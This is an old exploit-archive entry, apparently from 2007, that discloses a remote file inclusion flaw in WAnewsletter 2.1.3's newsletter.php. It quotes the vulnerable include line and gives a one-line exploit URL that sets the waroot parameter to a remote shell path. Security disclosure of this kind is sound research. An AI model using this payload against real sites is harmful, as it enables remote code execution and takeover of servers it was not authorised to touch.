WAnewsletter <= 2.1.3 Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : WAnewsletter <= 2.1.3 Remote File Inclusion Vulnerability
# Published : 2007-05-28
# Author : Mogatil
# Previous Title : Vistered Little 1.6a (skin) Remote File Disclosure Vulnerability
# Next Title : Joomla Component Phil-a-Form <= 1.2.0.0 SQL Injection Exploit

======================= S==A==U==D==I ========================

WAnewsletter-2.1.3 (newsletter.php) RFI Vul

==============================================================

Found By : Mogatil , jjl@hotmail.com

==============================================================

Script Site : http://script.emanual.ru/get?i=1053

==============================================================
File : /newsletter.php


require_once($waroot . 'start.php');

==============================================================

Thanx: cold zero . gawey Al Azary . crazy man . scorbion_22 .
the_muslim_sniper

==============================================================

Exploit :[Path]/newsletter/newsletter.php?waroot=shell

==============================================================

# www.Syue.com [2007-05-28]